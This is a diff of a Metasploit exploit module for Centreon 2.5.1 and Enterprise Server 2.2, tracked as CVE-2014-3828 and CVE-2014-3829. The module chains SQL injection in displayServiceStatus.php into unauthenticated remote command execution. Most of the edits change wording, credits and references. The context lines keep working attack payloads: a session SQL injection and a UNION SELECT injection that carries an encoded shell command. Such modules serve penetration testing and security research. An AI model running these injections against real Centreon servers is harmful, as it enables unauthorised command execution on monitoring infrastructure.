@@ -16,21 +16,23 @@ def initialize(info = {})
16
16
'Description' => %q{
17
17
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
18
18
Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
19
- displayServiceStatus.php component, allow to remote unauthenticated execution of
20
- arbitrary commands. The module only requires a session available in the application
21
- at the moment of exploitation . This module has been tested successfully on Centreon
22
- Enterprise Server 2.2.
19
+ displayServiceStatus.php component, allows remote unauthenticated execution of arbitrary
20
+ commands. The module only requires a session available in the application at the moment
21
+ of exploitation. It means a legit ust must be logged in . This module has been tested
22
+ successfully on Centreon Enterprise Server 2.2.
23
23
} ,
24
24
'License' => MSF_LICENSE ,
25
25
'Author' =>
26
26
[
27
- 'Tom MaZ' , # Vulnerability Discovery
27
+ 'MaZ' , # Vulnerability Discovery and Analysis
28
28
'juan vazquez' # Metasploit Module
29
29
] ,
30
30
'References' =>
31
31
[
32
32
[ 'CVE' , '2014-3828' ] ,
33
- [ 'CVE' , '2014-3829' ]
33
+ [ 'CVE' , '2014-3829' ] ,
34
+ [ 'US-CERT-VU' , '298796' ] ,
35
+ [ 'URL' , 'http://seclists.org/fulldisclosure/2014/Oct/78' ]
34
36
] ,
35
37
'Arch' => ARCH_CMD ,
36
38
'Platform' => 'unix' ,
@@ -84,7 +86,7 @@ def exploit
84
86
if check == Exploit ::CheckCode ::Safe
85
87
fail_with ( Failure ::NotVulnerable , "#{ peer } - The SQLi cannot be exploited" )
86
88
elsif check == Exploit ::CheckCode ::Detected
87
- fail_with ( Failure ::Unknown , "#{ peer } - The SQLi cannot be exploited or you just need to wait until someone logged in" )
89
+ fail_with ( Failure ::Unknown , "#{ peer } - The SQLi cannot be exploited, maybe you just need to wait until someone logs in" )
88
90
end
89
91
90
92
print_status ( "#{ peer } - Exploiting..." )
@@ -93,6 +95,7 @@ def exploit
93
95
session_injection = "#{ random_id } ' or '#{ random_char } '='#{ random_char } "
94
96
template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{ mysql_payload } 59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
95
97
res = send_template_id ( session_injection , template_injection )
98
+
96
99
if res && res . body && res . body . to_s =~ /sh: --imgformat: command not found/
97
100
vprint_status ( "Output: #{ res . body } " )
98
101
end
0 commit comments